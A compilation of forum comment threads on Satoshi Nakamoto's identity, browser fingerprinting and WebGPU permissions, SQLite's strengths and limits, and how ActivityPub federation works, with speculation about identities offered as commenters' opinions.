I think there is some systematic reason why people like Satoshi, Buckethead, Banksy, etc are not uncovered.
In each case, I doubt that it really is hard to figure out who they are.
Maybe it is the way the press and social media work. You get as many clicks for a wild theory as you get for a properly researched opinion.
As for Satoshi Nakamoto: The most obvious candidate seems to be Adam Back. His invention of proof of work, his biography, character, writing style and role as the CEO of the company behind the main wallet software all point to him. Also, his current communication "Bitcoin looks like something that was discovered rather than invented". That's something a creator typically says about a particularly great piece of work they did. Are there any arguments why he might not be the inventor of Bitcoin?
> As for Satoshi Nakamoto: The most obvious candidate seems to be Adam Back. His invention of proof of work, his biography, character, writing style and role as the CEO of the company behind the main wallet software all point to him.
Adam Back is obviously not Satoshi.
His level of writing or thinking is not even close to the level of Satoshi.
When asked what people should pay with when fees were high and Lightning Network wasn't complete, he seriously suggested people should just use tabs:
"Use another cryptocurrency" would be a much better recommendation that would solve the problem much better than tabs.
The reason why Bitcoin stopped working well was because Adam Back and others were actively sabotaging it's ability to cope with demand, and instead pushing people towards other solutions.
Those solutions were nowhere near ready, so the best Adam could come up with (except admitting they were wrong) was Tabs.
So yeah, instead of a brainfart it could just be malicious behavior.
The question asked on that video does not mention lightning.
But his answer begins by explaining lightning.
Back early on forsaw that lightning is the way forward and not larger blocks. Which is another indication to me, that he is indeed Nakamoto.
It was a great insight very much in line with Nakamoto's thinking. Nakamoto who forsaw so many things early on like the need for a script instead of just transaction data on the chain.
Meanwhile, in actual 2023, Bitcoin once again has bloated mempool and high transaction fees while big block Bitcoin cash is clearing regularly.
I think we have enough real history at this point to dismiss the notion that "lightning is the way forward" in an absolute, concrete and not theoretical way.
Entries on a blockchain are auctioned of in an auction which allow arbitrarely low bids. So it is to expected that there is a long tail of bids with a low chance to win.
If a mempool clears, that just means there is limited demand to use the chain, even for free.
> It can be phased in, like: if (blocknumber > 115000) maxblocksize = largerlimit It can start being in versions way ahead, so by the time it reaches that block number and goes into effect, the older versions that don’t have it are already obsolete.
Given that lightning still has shit UX without relying on third parties should be proof enough that it was and still is a terrible idea to rely on for Bitcoins usability.
Before lightning was a thing, he anticipated the block size would increase over time. And he changed his mind when the idea of level 2 came up. Which was the right thing to do. But hard to understand at that time.
UX is a problem throughout all crypto. No matter which coin, no matter L1 or L2. It's all still like the internet before the 90s.
I don't know about the others, but Banksy has been uncovered. It's Robin Gunningham. People still like to say it's "unconfirmed" and "a rumour" but if you look at the evidence there is no real doubt.
So I guess part of the reason is that people love the mystery so much, as long as the suspect doesn't come out and say "yes it's me" then they'll just hang on to the mystery. To be honest even if Gunningham said "I am Banksy" I suspect people would still say "but is he really? Nobody knows!"
Wikipedia says "Banksy is a pseudonymous England-based street artist, political activist and film director whose real name and identity remain unconfirmed and the subject of speculation."
Oh, interesting. So he only keeps his face secret, not his identity?
I remember reading an interview with Ozzy Osbourne who said he refused to work with Buckethead because it spooked him that BH always kept a mask on, even when they talked in private.
You can also find some pictures of his face on Google if you just search his name. I'd say Buckethead is closer to Thomas Bangalter and Guy-Manuel de Homem-Christo than he is to Banksy.
>systematic reason why people like Satoshi, Buckethead, Banksy, etc are not uncovered.
With Satoshi and Banksy it's not so hard to figure out but given that they both want anonymity, informed people tend not to say. Meanwhile random idiots post all sorts of stuff, some right, some wrong.
CORS is a browser security measure to protect users from malicious sites. This is an app and not a web browser and is therefore allowed to send HTTP requests to any URL it wants and to parse the HTTP responses as it deems necessary.
A possible DIY way is to use a e-ink display connected to a Raspberry Pi and build a script to display content stored on a usb-stick connected to the USB-Port of the Raspi.
Just one example: A script which runs many different types of computations. Each computation will take a certain amount of time depending on your hardware and software. So you will get a fingerprint like this:
Just put WebGL/WebGPU behind permission and the problem is solved. I don't understand why highly paid Google and Firefox developers cannot understand such a simple idea.
For a user to correctly answer a permissions dialog, they need to learn programming and read all the source code of the application. To say nothing of the negative effects of permission dialog fatigue.
In practice, no-one who answers a web permissions dialog truly knows if they have made the correct answer.
Asking the user a question they realistically can't answer correctly is not a solution. It's giving up on the problem.
I think browsers should distinguish more aggressively between "web application", "web site", and "user hostile web site".
Many APIs should be gated behind being a web application. This itself could be a permission dialog already, with a big warning that this enables tracking and "no reputable web site will ask for it unless it is clear why this permission is needed - in doubt, choose no".
Collect opt-in telemetry. Web sites that claim to be a web application but keep getting denied can then be reclassified as hostile web sites, at which point they not only lose the ability to annoy users with web app permission prompts, but also other privileges that web sites don't need.
Clearly if we knew how to perfectly identify user hostile websites we'd not need permissions dialogs at all.
Distinguishing between site and app, e.g. via an installation process, is equivalent to a permissions dialog, except that you're now advocating for one giant permission dialog instead of fine-grained ones, which seems like a step backwards.
Yes, if we knew how to do it perfectly, we wouldn't need them. But we can identify some known-good and known-bad cases with high confidence. My proposal mainly addresses the "fatigue" aspect: it allows apps to use some of the more powerful features without letting every web site use them, and it prevents random web sites from declaring themselves an app and spamming users with the permission request just so they can abuse the users more.
The new permission dialog wouldn't grant all of the finer-grained permissions - it would be a prerequisite to requesting them in the first place.
Curating known good would equate to some sort of app store. There are probably initiatives to make one for web apps, but it kind of makes me sad to think of applying that to the web, which is supposed to be a free and open commons (although I suppose Google already de facto controls enough of it to be considered a bit of a gatekeeper).
Making the user the arbiter of "known good", ie reliance on permissions dialogs, is not perfect but it's what we have. Yet I fail to see how your proposal of "just add ANOTHER dialog" improves the situation.
Do you have something specific in mind with your opening paragraph?
Because defining what is a web site and what's an app, strikes me as particularly impractical idea. You correctly point out that yes, there are a number of powerful APIs that should be behind permissions. But there are a number of permissions already, so we need to start bundling them and also figure out how to present all this to the regular user.
Frankly, I wouldn't know where to begin with all this.
News sites are a particular category that I expect to spam people with permission prompts, as they did when notifications became a thing. Without the deterrent of possibly landing in the naughty box, they'd all do it. With it, I still expect some of them to try until they land in the box.
> In practice, no-one who answers a web permissions dialog truly knows if they have made the correct answer.
Counterpoint: if webpage with latest news (for example) immediately asks me to allow notification, access to webcamera and location I definitely know what is correct answer to these dialogs.
"Do you want to allow example.com to send you notifications" is way more understandable to a layperson than "do you want to allow access to WebGPU" or "do you want to allow access to your graphics card". Especially because they would still have access to canvas and WebGL.
Permission prompts are a HUGE user education issue and also a fatigue issue. Rendering is widely used on websites so if users get the prompt constantly they're going to tune it out.
They don't need to learn programming. Just write that this technology can be used for displaying 3D graphics and fingerprinting and let user decide whether they take the risk.
They're going to be confused if you say "display 3D graphics", because canvas and WebGL will still work. The website will just be laggier and burn their battery faster. That's not going to make sense to them.
"Fingerprinting" is a better approach to the messaging, but is also going to be confusing since if you take that approach, almost all modern permissions are fingerprinting permissions, so now you have the problem of "okay, this website requires fingerprinting class A but not fingerprinting class B" and we expect an ordinary user to understand that somehow?
Most of them will say, "I need to see this site, who cares about fingerprints." Some will notice that they're on their screen anyway, a few will know what it's all about.
Maybe "it can be used to display 3D graphics and to track you", but I expect that most people will shrug and go on.
The page implies it no longer requires permissions, but I just tested and you definitely get a permissions popup, just a different one.
WebHID, WebUSB and Filesystem Access are IIRC, "considered harmful" so they won't get implemented. And Sensor support was removed after sites started abusing battery APIs.
I'm not. It's a bit of a sarcasm (?) listing a subset of APIs that browsers implement (or push forward against objections like hardware APIs) and that all require some sort of permission.
> but this is exactly the path Firefox was advocating
Originally? Perhaps. Since then Firefox's stance is very much "we can't just pile on more and more permissions for every API because we can't properly explain to the user what the hell is going on, and permission fatigue is a thing"
Everything except WebGL and WebGPU allows the system to change more state than what is rendered on a screen.
Users already expect browsers to change screen contents. That's why WebGPU / WebGL aren't behind a permission block (any moreso than "show images" should be... Hey, remember back in the day when that was a thing?).
Saturating the user with permissions requests for every single website they visit is a dead-end idea. We have decades of browser development and UI design history to show that if you saturate the user with nag prompts that don't mean anything to them, they will just mechanically click yes or no (whichever option makes the website work).
Permission popups can be replaced with an additional permission toolbar or with a button in the address bar user needs to click. This way they won't be annoying and won't require a click to dismiss.
Like the site settings page on Chrome, which is in the address bar (clicking the lock icon)? You can set the permissions (including defaults) for like 50 of these APIs.
We already have extensions for websites that spam the user with unwanted popups and other displays. Those just need to be extended to cover permission abuse and be included by default in all webbrowsers.
I do this since forever, but I have to give explicit permission to load and run JS, which solves a lot of other problems as well. Letting any site just willy-nilly load code from whereever and run it on your machine is insane, and it's well worth the effort to manually whitelist every site.
It's not that they don't understand it, it's that they don't want the average user to have a convenient way to control this setting. Prompting the user for permission would give the user a very convenient way to keep it disabled for most websites. It's as simple as that.
Think about it this way: Which is more tedious: going into the settings and enabling and disabling webGPU every time you need it or a popup? Which way would see you keeping it enabled?
"Completely co-incidentally", it's in Google's best interest to be able to fingerprint everyone.
So, changing it to actually be privacy friendly while they have the lion's share of the market doesn't seem like it's going to happen without some major external intervention. :/
It's running on Chrome. Google doesn't need fingerprinting. By making it harder for others to fingerprint it actually cements Google position in the ad market.
Just don’t use Chrome. There are plenty of alternative web browsers you can choose that are more privacy oriented. You are not Chrome’s customer unless you pay for it - or you have 100% money back guarantee. Demanding features on free product is never going to go anywhere.
You can reduce clock precision, which has already been done to mitigate speculative execution attacks. You can delay network requests to prevent the JS from using the server as a more precise clock. In addition to random delays, you can quantize execution times by only responding in 100ms increments, for example. You can do lots of things to mitigate fingerprinting, if not completely prevent it.
But then you could also just omit features that have no reason to exist in the first place.
You only get fingerprinting from your method if the variation of the “fingerprint“ between two different runs by the same user is lower than the difference you get between two different users. This is far from obvious since it depends a lot on the workload running on the machine at the time.
I'm not aware of a single fingerprinting tool that primarily use this king of timing attack rather than more traditional fingerprinting methods.
We would have to make examples of what Computation1 is and what Computation2 is to make a prediction if certain types of workloads will impact the ratio of their performance.
Example:
s=performance.now();
r=0;
for (i=0; i<1000000; i++) r+=1;
t1=performance.now()-s;
s=performance.now();
r=0;
for (i=0; i<1000000; i++) r+="bladibla".match(/bla/)[0].length;
t2=performance.now()-s;
console.log("Ratio: " + t2/t1);
For me, the ratio is consistently larger in Chrome than in Firefox. Which workload would reverse that?
Fingerprinting in the usual sense the term isn't about distinguishing Chrome from Firefox, it's about distinguishing user A from user B, … user X reliably in order to be able to track the user across website and navigation sessions.
Your example is unlikely to get you far.
Edit: in a quick test, I got a range between 8 and 49 in Chrome, and between 1.27 and 51 (!) on Firefox, on the same computer, the results are very noisy.
> Chrome and Firefox here are an example for "Two users who use exactly the same hardware but different software".
But it's also the most pathological example one can think of, yet the results are extremely noisy (while being very costly, which means you won't be able to make a big number of such test without dramatically affecting the user's ability to just browse your website).
Sure. And nobody actually wants that, because it would be so restrictive in practice that you might as well just limit yourself to plain text.
The horse bolted long ago; there's little sense in trying to prevent future web platform features from enabling fingerprinting, because the existing surface that enables it is way too big to do anything meaningful about it.
Here are a couple of more constructive things to do:
- Campaign to make fingerprinting illegal in as many jurisdictions as possible. This addresses the big "legitimate" companies.
- Use some combination of allow-listing, deny-listing, and "grey-listing" to lock down what untrusted websites can do with your browser. I'm sure I've seen extensions and Pi-hole type products for this. You could even stop your browser from sending anything to untrusted sites except simple GET requests to pages that show up on Google. (I.e. make it harder for them to smuggle information back to the server.)
- Support projects like the Internet Archive that enable viewing large parts of the web without ever making a request to the original server.
This would essentially mean that every computation would have to run as slow as the slowest supported hardware. It would completely undermine the entire point of supporting hardware acceleration.
I’m sympathetic to the privacy concerns but this isn’t a solution worth considering.
Everything that can be used for fingerprinting should be behind a permission. Almost all sites I use (like Google, Hacker News or Youtube) need none of those technologies.
Main thing that ought to be behind a permission is letting Javascript initiate connections or modify anything that might be sent in a request. Should be possible, but ought to require asking first.
If the data can't be exfiltrated, who cares if they can fingerprint?
Letting JS communicate with servers without the user's explicit consent was the original sin of web dev, that ruined everything. Turned it from a user-controlled experience to one giant spyware service.
If javascript can modify the set of URLs the page can access (e.g. put an image tag on the page or tweak what images need to be downloaded using CSS) then it can signal information to the server. Without those basic capabilities, what's the point of using javascript?
No video driver is actually going to implement fixed-time rendering. So you'd have to implement it in user-space, and it would be even slower than WebGL. Nobody wants that. You're basically just saying the feature shouldn't ship in an indirect way (which is a valid opinion you should just express directly.)
I don't mean to prescribe the way to stop fingerprinting, just throwing out a trivial existence proof, and maybe a starting point of thinking, that it's not impossible like was suggested.
Also, WebGPU seems to conceptually support software rendering ("fallback adapter"), where fixed time rendering would seem to be possible even without getting cooperation from HW drivers. Being slower than WebGL might still be an acceptable tradeoff at least if the alternative WebGL API avenue of fingerprinting could be plugged.
Could you explain what techniques would make this possible? I can see how it's possible in principle, if you, say, compile JS down to bytecode and then have the interpreter time the execution of every instruction. I don't immediately see a way to do it that's compatible with any kind of efficient execution model.
The rest would be optimization while keeping the timing sidechannel constraint in mind, hard to say what the performance possibilities are. For example not all computations have externally observable side effects, so those parts could be executed conventionally if the runtime could guarantee it. Or the program-visible clock APIs might be keeping virtual time that makes it seem from timing POV that operations are slower than they are, combined with network API checkpoints that halt execution until virtual time catches up with real time. Etc. Seems like a interesting research area.
>not all computations have externally observable side effects
You can time any computation. So they all have that side effect.
Also, from Javascript you can execute tons of C++ code (e.g. via DOM manipulation). There's no way all of that native code can be guaranteed to run with consistent timing across platforms.
Depends on who you mean by "you". In context of fingerprinting resistance the timing would have to be done by code in certain limited ways using browser APIs or side channels that transmit information outside the JS runtime.
Computations that call into native APIs can be put in the "has observable side effects" category (but in more fine grained treatment, some could have more specific handling).
In this case the runtime would not be able to guarantee that the timing has no externally observable side effects (at least if you do something with t). It would then run in the fixed execution speed mode.
Lots of code accesses the current time. So I think you'd end up just running 90% of realistic code in the fixed execution speed mode, which wouldn't be sufficiently performant.
It's hard to reason about how much noise is guaranteed to be enough, because it depends on how much measurement the adversary has a chance to do, there could be collusion beween several sites, etc. To allow timing API usage I'd be more inclined toward the virtual time thing I mentioned upthread.
My prediction: SQLite will keep gaining popularity.
Especially among pragmatic software builders who run their own business and do not work for the man. A demographic that I expect to grow.
Talking about SQLite: Is there any downside to partitioning an SQLite db into multiple files?
For example one of my systems has a table 'details' which is not vital for the system to work. It's just a nice to have, to have data in this table. And it is pretty big, growing fast.
When I copy the DB over to another system, I don't need that table. So it would be nice to have like primary.db and secondary.db. With 'details' in secondary.db. Any downside to this approach? Are JOINS slower across two files than across two tables in the same file?
SQLite has seen runaway popularity on HN lately and I bought into the hype too for a while but when I look under the hood, the 3rd party backup and replication stories just seem janky, tedious and not yet mature. It's the kind of thing where a misconfiguration could wipe out everything and/or waste you hours of time.
>Especially among pragmatic software builders who run their own business and do not work for the man.
That's the perfect use case for a SaaS database. Administering a database adds zero business value and you'd be doing it to save at most $50 a month.
> SQLite has seen runaway popularity on HN lately and I bought into the hype too for a while but when I look under the hood, the 3rd party backup and replication stories just seem janky, tedious and not yet mature. It's the kind of thing where a misconfiguration could wipe out everything and/or waste you hours of time.
If you treat it as a database outside of your application code, yes. Its "database replication" tools are far behind.
But that's "using it wrong". Outside of the application code using it, a sqlite database should be treated as a file, that's the whole magic of it.
Backup and replication tools for files are great and mature, far more mature than for most database. Something as simple as rsync already covers 99% of use case you need for it.
If you need "live replication across multiple servers" or something like that, you're completely out of the scope of the what sqlite is made for.
I also find SQLite to be a poor solution for a backend database.
In particular - it makes it incredibly frustrating to manage multiple instances accessing it, and has some very strict limitations around how the underlying FS is mounted.
SQLite is an incredible tool - but the right place for it is in a deployed client application (where - seriously - it's a first class project and is an incredible joy). It's not really designed to be your web db.
Priory art warning: every shack that rents out a /home/$customerid slice running phpmyadmin already is on the seller side of the SaaS database market. That market is just not very interesting.
> When I copy the DB over to another system, I don't need that table. So it would be nice to have like primary.db and secondary.db. With 'details' in secondary.db. Any downside to this approach? Are JOINS slower across two files than across two tables in the same file?
I'm in the middle of refactoring my personal project such that "shared" data is in one database, and "personal" data is in a separate database; the idea being that every user will have a separate SQLite "connection", with their own "personal" data ATTACHed. I had reasonably extensive functional testing before the refactor, and after the refactor I didn't have any issues from a functional perspective.
Potential advantages:
- Each user can download their own "personal" database whenever they want
- This is essentially a form of "sharding", which should go a long way towards mitigating the "single writer" bottleneck; as the "shared data" will change much less frequently than the "personal" data. It should also make it fairly straightforward to distribute the workload across multiple servers / regions, should my project ever get that big.
Haven't done any performance testing yet.
Main issues I've encountered so far:
- Foreign key constraints across the databases is missing; that's just a reduction in safety, however.
- Golang's "automatic connection management" doesn't play well with SQLite's "ATTACH" command: it expect to automatically open new connections, but the secondary connections won't have the ATTACHed databases. This is solvable, but something to watch out for.
As implied, I'm still in the middle of changing things over, so it's early days; but so far things seem positive.
The very problem of SQLite: Single user only. Although SQLite does have WAL but it still doesn't allow you to do concurrent write unless you want to see file corruption.
This means SQLite is very much locked to things that works with one specific purpose and almost nothing else. Sure, you can be read-only, but you have to run alongside the app in the specific node, too.
Another problem (although without solving the single user mindset this wouldn't be a problem at all) is high availability. You want to make sure that your database won't get lost do you.
Things like Litestream [1] attempts to solve the SQLite backup problem it by continuously saving the database state and pack t up to S3-compatibles or file system but its just half the story. You want to make sure your operation not stopping. This is where HA comes in to save you from an emergency fixup when you are enjoying your holiday.
It doesn't mean that nobody tried to solve both these problems though. Ahem, introducing rqlite [2]. Although my own experience is not very great because the memory usage is quite high and does not fit my need (because the embedded device only has 512MB on it, and every byte counts, sorry), I guess that's the price to pay if you want to turn a non-multiuser, non-concurrently acccess database into one...Another honorable mention would be LiteFS [3] but I haven't used it yet so I have no say on it.
Setting up Postgres is a PITA compared to SQLite. It comes bundled with python these days. Obviously it's going to be a trade off as to which one causes you more pain.
I manly work as a sysadmin for small companies. (Most people don't call us when they install new tools, they call when they exploded.) All my hatred goes out to the (Windows) programs (and its creators) that think they need MS SQL Express or the likes to save their two bytes of dust.
All my love goes to the programs that just run/save from/to a UNC path.
Has SMB locking, and OP Locking become that much more reliable?
Pretty much one of the classic desktop support calls for me was "my access database on the shared drive is corrupt"
I'm out touch now, but one of the failure modes seemed to be that a client would take out an oplock, so it could do local caching etc. Then someone else opens the file, the server sends the oplock break to original client but that message gets lost/ignored, and we end up with 2 or more clients now making unsynchronised changes to a file.
Any smb client access to shared data more complicated than documents and spreadsheets just makes me twitch these days.
It was a long time ago now, and it probably was more prevalent in larger environments.. just more chances for things to go wrong I'd guess.
If something is designed for shared filesystems that's different, but my experience was that at the low midrange things aren't. They seem to work, until they don't.
What's wrong with sql express? Assuming you fit within its size constraints?
> Pretty much one of the classic desktop support calls for me was "my access database on the shared drive is corrupt"
Yes, that one >12 year old access database with two concurrent users brakes biweekly. Everything else: No problems.
Just this Thursday I "moved" a program from an old PC to a new one. We more or less support this client since 7 years. The PC is from before that. Got the call. First time hearing about that lab software. Right click on the desktop icon. Oh, it just points to an UNC path on the "main server" (Linux Samba share). Took a look into the settings. It has a path to a SQLite DB. Also just an UNC path.
Only two clients using it. It worked unattended for years. Since it's stored on the "main server" it's also covered by backup. No client side installation necessary.
Copy the link. Update our documentation that we know it exists, what is it used for and how it works. Done.
I see it time and time again: Desktop software that runs on one PC, produces/saves tiny amounts of data (like a temperature monitor for one fridge), but installs a SQL server. A random technician shows up, installs it and leaves. We don't know that it exists. It's therefore not part of a backup concept. It's usually only discovered when it explodes or when the PC is renewed (or when a second PostgreSQL install creates a TCP port conflict). I have the feeling only 1 out of 10 "softwares" even have a proper concept for export and import of data.
A client with like 7 or 8 workers called my because he wanted me to move his new time tracking software. The technician who also installed the NFC reader apparently installed it on the wrong PC. It took over 3 hours! It downloaded GBs and GBs of .NET, SQL Express and what not. I didn't know that going in/clicking the setup.exe. I had to call support to get the Express DB over. I can still hear the hard drive screaming. ...man... for stuff a Z80 and a CSV file would be enough. ...And I am the bad one for explaining to the client that the DB needs to be backuped. I sound like I want to upsell him something.
I know, I know. This rant is not about databases. It's about the state of IT and arrogant developers who don't live in the trenches. The "pulling down additional gigabytes of images and runtime to run the database" > "Yes. It works great." triggered me. I'm sorry.
You know. Not everything is a unicorn webapp.
> Any smb client access to shared data more complicated than documents and spreadsheets just makes me twitch these days.
I know of multiple large install bases of an old medical software. It's still actively developed/supported but it is so old that it doesn't use a SQL but ISAM database. It just lies there, on a file share. No active server component to speak of. No client site installation necessary.
> What's wrong with sql express? Assuming you fit within its size constraints?
If it is not used for something a CSV file would be enough. If the costumer is told that it needs to be installed "on a server". If we get involved from the beginning so we know what is what. If the costumer doesn't expect me to be able to move it out of the blue within seconds. Than sql express is fine.
...which reminds me of that one time, when that well-hung developer of a software for the energy sector didn't knew that express only can allocate up to 2GB. Obviously he was blamed us for delivering a faulty server...
agreed, running pg locally is a pain. I use a cloud postgres instance (even for local dev). They're dirt cheap and it's not worth the hassle of working with a local pg.
I love Postgres.app on mac, makes running locally a breeze. Running Postgres fast on the cloud is what I always struggled with (without paying enormous sums)
None that I can think of unless you need foreign key constraints between both.
> Are JOINS slower across two files than across two tables in the same file?
I was recently debugging as slow JOIN with ATTACH'ed databases and the query plan looked the same as when both tables were in the same database. I don't think it makes any difference.
But in these situations, the solution is measuring and benchmarking for your use case.
I keep reaching for SQLite and it keeps working. Although I've been needing a better review of what other embedded databases I should be considering in 2022. I tried Genji[1] recently and tore it out as it wasn't doing ORDER BY with multiple columns.
> Especially among pragmatic software builders who run their own business and do not work for the man. A demographic that I expect to grow.
From the FAQ; the are lots of caveats (especially, the last).
> Situations Where A Client/Server RDBMS May Work Better
> Client/Server Applications
> If there are many client programs sending SQL to the same database over a network, then use a client/server database engine instead of SQLite. SQLite will work over a network filesystem, but because of the latency associated with most network filesystems, performance will not be great. Also, file locking logic is buggy in many network filesystem implementations (on both Unix and Windows). If file locking does not work correctly, two or more clients might try to modify the same part of the same database at the same time, resulting in corruption. Because this problem results from bugs in the underlying filesystem implementation, there is nothing SQLite can do to prevent it.
> A good rule of thumb is to avoid using SQLite in situations where the same database will be accessed directly (without an intervening application server) and simultaneously from many computers over a network.
> High-volume Websites
> SQLite will normally work fine as the database backend to a website. But if the website is write-intensive or is so busy that it requires multiple servers, then consider using an enterprise-class client/server database engine instead of SQLite.
> Very large datasets
> An SQLite database is limited in size to 281 terabytes (248 bytes, 256 tibibytes). And even if it could handle larger databases, SQLite stores the entire database in a single disk file and many filesystems limit the maximum size of files to something less than this. So if you are contemplating databases of this magnitude, you would do well to consider using a client/server database engine that spreads its content across multiple disk files, and perhaps across multiple volumes.
> High Concurrency
> SQLite supports an unlimited number of simultaneous readers, but it will only allow one writer at any instant in time. For many situations, this is not a problem. Writers queue up. Each application does its database work quickly and moves on, and no lock lasts for more than a few dozen milliseconds. But there are some applications that require more concurrency, and those applications may need to seek a different solution.
For me an important caveat is the typing. With all respect for the original author of SQLite -- he has done an outstanding job-- I think he underestimates the value of a good typing system. I have seen some databases that had all kinds of messy data. Back in the day MySQL was also quite loose with regards to checking data. Undoing the damage is in most cases not possible. For a business data is more important than code, so be strict up front.
I know, SQLite has added the option to enforce type checking. The authors still don´t believe in the value of it and the available types are quite limited and thus loose. I think this is something that pgsql got quite right, where you can have your domain types on the database level.
On the other hand, if you keep this as a replacement for your config file ( I thought this was the original purpose?), then yeah, you get an awesome deal. I wouldn't dare to build my business on it, just like I don´t believe in MongoDb and any untyped language for serious purposes.
As others have pointed out, there's the strict mode now which is still quite restricted (pun intended), but what you most often don't hear is that you can also use check constraints, as in
sqlite> create table t ( id integer primary key, n integer check ( typeof( n ) = 'integer' ) );
sqlite> insert into t ( n ) values ( 1 );
sqlite> insert into t ( n ) values ( '1' );
sqlite> insert into t ( n ) values ( true );
sqlite> insert into t ( n ) values ( 'x' );
Runtime error: CHECK constraint failed: typeof( n ) = 'integer' (19)
sqlite> select * from t;
┌────┬───┐
│ id │ n │
├────┼───┤
│ 1 │ 1 │
│ 2 │ 1 │
│ 3 │ 1 │
└────┴───┘
sqlite> select ( select n from t where id = 1 ) = ( select n from t where id = 2 );
1 // i.e. true
Check constraints do have the advantage over more classical types that additional constraints can be declared such as valid ranges for numerical types etc.
>I think this is something that pgsql got quite right
I don't think so. For example, pgsql had an array type before it got JSON, so the drivers can't automatically convert arrays that you want to insert into JSON. With my SQLite ORM, you can just insert arrays and objects and it knows to convert them automatically to JSON.
I like that SQLite just has a few primitive types. My ORM will be able to build on top of them. For example, JavaScript will soon be adding new date types (Temporal), and I will create new types for that, which will be stored as text ultimately.
Which is quite limited in scope and does not allow for boolean (faux-boolean, of course) or json columns. It also affects certain operations in ways that might not be immediately obvious.
Not sure if this has received any further work since its release.
>If there are many client programs sending SQL to the same database over a network
I believe this is a reference to enterprises that have different users querying the database directly with SQL that they wrote over a network to a central database.
My prediction: Database gatekeeping will continue into next year.
Lots of X is a toy database, Y is all you need for every use case, nobody really needs scalability, high-availability etc and above all else never use an ORM. Real engineers write SQL by hand.
Are likes not federated through the Fediverse? If someone on mastodon.social likes a post on pixelfed.social, will that increase the like count on pixelfed.social?
Where receive.php is openly accessible and send.php is protected by a password.
The endpoints are surely called differently than receive.php and send.php. But this is how I would hope ActivityPub works in principle.
Of course, this would be very bare. To read, I would have to read the raw log of ActivityPub messages and to post, I would have to manualy put together an ActivityPub message.
But I would be in the Fediverse and could add more convenience functionality later.
- send requests with proper 'HTTP Signatures' (many AP nodes have strict enforcement here)
- which requires you to have an actor with an attached signing pubkey
- so you have to host the LD-JSON actor descriptor on another endpoint
- actors MUST have an attached inbox & outbox, your receive endpoint will need to sit at your actor's inbox (on POST). both of these are OrderedCollections of Activities
- and in order to be properly interoperable you will probably need to maintain follow relations & write an endpoint which can ACK/NAK follows, etc etc
If admin of serverA decides to add serverB to the servers_i_talk_to array, they also ask serverB to give them a public key and from then on serverA only accepts messages from serverB if they are signed with the corresponding private key?
Is that so that serverB can change its IP without interrupting the communication with serverA?
The fediverse is (generally) an open federation, not a closed one like you're describing. There is no manually-curated list of instances that you federate with.
I would expect "Open Federation" does not mean you need to talk to every instance out there directly. But that it works like a web where messages are routed around. I could be wrong. But I would expect the "servers_i_talk_to" array is what the instances output at the "peers" endpoint:
There's not really any routing, but you don't need to send posts to every instance, just every instance that has users following your instance's users.
HTTP signatures ensure that you can't send a message and spoof the user/instance that it's coming from. Think of it like DKIM for AP.
They commonly include the specific actor who is interacting with the network (via the instance), so we can also achieve correct-side enforcement of blocks.
Sure an actor is basically a user, there's usually an "instance actor" though too that does some other things but I don't think having one is required. Every actor has a private key but it's kept on the server, it's basically an implementation detail.
Strange that users have private keys. Is that kinda forward-looking, so that at some point those keys could be moved to the users themselves? So they can keep their identity, even if the owner of their instance becomes malicious?
The private key is used in HTTP Signatures for authentication. The signature does not cover the body of the http request and is not stored or published. The http post contains an http headers that signs just a few other header fields. The signature is only valid for a short time.
That'd be cool, but it just uses publicly available APIs for this. Most of the data like that isn't reported through the public APIs across various types of software. Bad data is tossed out (e.g., the you-think-your-fake-numbers-are-impressive.well-this-instance-contains-all-living-humans.lubar.me lists over 7 billion accounts) but data that is (as far as I know) accurate is presented as-is.
Looks like you are correct, yeah, and the raw logs show 7,410 of the 10,729 live instances have it. Lemme hack it in real quick; I can't put it onto the big pages and not sure how well adding another column to that table will work, but give me like five minutes.
I tried a few instances and none of the UIs clicked with me very much.
With themes, I not only mean custom colors and fonts. I mean custom templates, so I can rearrange the position of elements and leave out some elements altogether.
Judging by how all the Mastodon sites seem to have minor CSS changes at most, I'd say not in any significant way. But there are other front ends for the Fediverse network. Perhaps check out instances running Pleroma, Misskey, or Soapbox and see if any of those suit you further. Some instances even run multiple front ends at once (typically on different subdomains) and you can use the same credentials to log in to all of them.
I don't understand how something can be a frontent for Mastodon.
Mastodon is an ActivityPub client.
If you write a new application from scratch that also uses the ActivityPub protocol, like Pinafore, it is not a frontend for Mastodon. It is another ActivityPub client, right?
I think this is where the confusion stems from, the way I understand it:
Mastodon is a server that implements the federation part of the ActivityPub protocol to exchange objects with compatible server software.
It has functionality which exceeds the ActivityPub client-to-server protocol,
which it doesn't implement, and opts to instead have its own client API. [1]
So if you were to write an application using the ActivityPub C2S protocol,
you could not directly communicate with a Mastodon server,
but could interact with objects created by a Mastodon server through
another server software implementing both the federation and C2S protocol.
So in that sense they are Mastodon frontends because they probably use the Mastodon specific API instead of the ActivityPub C2S protocol.
Here is for example a list of implementations which includes whether the client-to-server protocol is supported [2].
So as I understand it, Mastodon is a Ruby on Rails web server that speaks to other instances using the ActivityPub protocol in a technical sense.
You register with a given Mastodon instance which speaks ActivityPub to other servers which may or may not be Mastodon instances as well.
Now your home Mastodon instance also serves a React frontend which is technically acting as an OAuth2 client that speaks to the backend via REST APIs, compared to say: Server-side rendered HTML
Similarly, mobile apps connecting to your preferred instance are also OAuth2 clients.
In that sense, you can use a different frontend to speak directly to the REST APIs offered by your Mastodon instance of choice.
This all being one level above ActivityPub itself of course.
If I register with a Mastdodon instance, then why do I need a "home Mastodon instance"? Wouldn't I just use the web frontend the instance I registered with provides?
Your content is federated but your account is not so in order to actually perform actions, you need to make calls back to your home instance.
In a literal sense, your username and password / authentication tokens live on that server and is unknowable to other servers.
You might imagine that if there was federation of accounts than any random user could simply eat up passwords/password hashes.
That said, you can presumably use any client as long as it uses the APIs of the home instance.
You can browse other instances and do a remote follow however where that instance calls back to your home instance to initiate the follow action but it requires you telling the remote server what your full ID is (@Timja@home.instance) so it knows where to call back to
No, it's incredibly difficult to style Mastodon beyond minor CSS additions via the admin panel. If you really want to change anything substantial you need to fork the entire project.
There's the 'advanced web interface' which allows you to choose several columns with your choice of stuff in each. You enable it by going to settings in your browser.
In each case, I doubt that it really is hard to figure out who they are.
Maybe it is the way the press and social media work. You get as many clicks for a wild theory as you get for a properly researched opinion.
As for Satoshi Nakamoto: The most obvious candidate seems to be Adam Back. His invention of proof of work, his biography, character, writing style and role as the CEO of the company behind the main wallet software all point to him. Also, his current communication "Bitcoin looks like something that was discovered rather than invented". That's something a creator typically says about a particularly great piece of work they did. Are there any arguments why he might not be the inventor of Bitcoin?